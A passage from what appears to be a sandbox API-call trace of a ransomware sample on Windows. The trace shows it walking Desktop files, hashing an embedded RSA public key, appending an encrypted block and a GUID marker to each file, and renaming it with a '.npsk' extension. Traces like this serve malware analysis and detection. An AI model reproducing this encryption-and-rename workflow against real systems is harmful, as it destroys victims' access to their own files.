lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=43746) returned 1 [0214.733] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.736] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xaabc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.736] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.738] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xaae2, lpOverlapped=0x0) returned 1 [0214.739] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.739] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.739] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.739] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.740] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.740] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.740] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.740] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.740] GetLastError () returned 0x0 [0214.740] SetLastError (dwErrCode=0x0) [0214.740] GetLastError () returned 0x0 [0214.740] SetLastError (dwErrCode=0x0) [0214.740] GetLastError () returned 0x0 [0214.740] SetLastError (dwErrCode=0x0) [0214.740] GetLastError () returned 0x0 [0214.740] SetLastError (dwErrCode=0x0) [0214.740] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] GetLastError () returned 0x0 [0214.741] SetLastError (dwErrCode=0x0) [0214.741] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.742] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.742] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.742] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.742] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.742] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.742] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.742] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.743] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xaae2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.743] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.743] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.743] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.743] CloseHandle (hObject=0x61c) returned 1 [0214.745] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9uB41.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9ub41.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9uB41.ods.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9ub41.ods.npsk")) returned 1 [0214.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ff88 | out: hHeap=0x750000) returned 1 [0214.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.746] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.747] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18edf30, ftCreationTime.dwHighDateTime=0x1d5e643, ftLastAccessTime.dwLowDateTime=0xaee8ff90, ftLastAccessTime.dwHighDateTime=0x1d5e264, ftLastWriteTime.dwLowDateTime=0xaee8ff90, ftLastWriteTime.dwHighDateTime=0x1d5e264, nFileSizeHigh=0x0, nFileSizeLow=0x15fd1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ALIa54IfVTUSG.csv", cAlternateFileName="ALIA54~1.CSV")) returned 1 [0214.747] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ALIa54IfVTUSG.csv") returned=".csv" [0214.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ALIa54IfVTUSG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\alia54ifvtusg.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.748] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=90065) returned 1 [0214.748] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.750] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15fab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.750] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.753] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x15fd1, lpOverlapped=0x0) returned 1 [0214.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.754] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.755] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.755] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.755] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.755] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.755] GetLastError () returned 0x0 [0214.755] SetLastError (dwErrCode=0x0) [0214.755] GetLastError () returned 0x0 [0214.755] SetLastError (dwErrCode=0x0) [0214.755] GetLastError () returned 0x0 [0214.755] SetLastError (dwErrCode=0x0) [0214.755] GetLastError () returned 0x0 [0214.755] SetLastError (dwErrCode=0x0) [0214.755] GetLastError () returned 0x0 [0214.756] SetLastError (dwErrCode=0x0) [0214.756] GetLastError () returned 0x0 [0214.756] SetLastError (dwErrCode=0x0) [0214.756] GetLastError () returned 0x0 [0214.756] SetLastError (dwErrCode=0x0) [0214.756] GetLastError () returned 0x0 [0214.756] SetLastError (dwErrCode=0x0) [0214.756] GetLastError () returned 0x0 [0214.756] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.756] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.756] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.756] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.756] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.756] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.756] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.757] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.757] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15fd1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.758] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.758] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.758] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.758] CloseHandle (hObject=0x61c) returned 1 [0214.760] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ALIa54IfVTUSG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\alia54ifvtusg.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ALIa54IfVTUSG.csv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\alia54ifvtusg.csv.npsk")) returned 1 [0214.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ff88 | out: hHeap=0x750000) returned 1 [0214.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.762] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.763] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10203800, ftCreationTime.dwHighDateTime=0x1d5e247, ftLastAccessTime.dwLowDateTime=0xf0cdb270, ftLastAccessTime.dwHighDateTime=0x1d5e4df, ftLastWriteTime.dwLowDateTime=0xf0cdb270, ftLastWriteTime.dwHighDateTime=0x1d5e4df, nFileSizeHigh=0x0, nFileSizeLow=0x3e6d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C92L94lGKrwlxv4.gif", cAlternateFileName="C92L94~1.GIF")) returned 1 [0214.763] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C92L94lGKrwlxv4.gif") returned=".gif" [0214.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C92L94lGKrwlxv4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c92l94lgkrwlxv4.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.763] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=15981) returned 1 [0214.763] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.766] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x3e47, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.766] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.767] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x3e6d, lpOverlapped=0x0) returned 1 [0214.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.767] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0214.768] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.768] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.768] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.768] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.768] GetLastError () returned 0x0 [0214.768] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.768] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0214.768] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.768] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.768] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.768] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.768] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.768] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.769] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x3e6d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.769] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.769] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.769] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.769] CloseHandle (hObject=0x61c) returned 1 [0214.771] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C92L94lGKrwlxv4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c92l94lgkrwlxv4.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C92L94lGKrwlxv4.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c92l94lgkrwlxv4.gif.npsk")) returned 1 [0214.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ff88 | out: hHeap=0x750000) returned 1 [0214.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.772] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0214.774] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0214.774] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0214.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.774] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dc179c0, ftCreationTime.dwHighDateTime=0x1d5e06d, ftLastAccessTime.dwLowDateTime=0x531b9e90, ftLastAccessTime.dwHighDateTime=0x1d5d82b, ftLastWriteTime.dwLowDateTime=0x531b9e90, ftLastWriteTime.dwHighDateTime=0x1d5d82b, nFileSizeHigh=0x0, nFileSizeLow=0x170af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G0G1KclC.gif", cAlternateFileName="")) returned 1 [0214.774] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G0G1KclC.gif") returned=".gif" [0214.774] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G0G1KclC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g0g1kclc.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 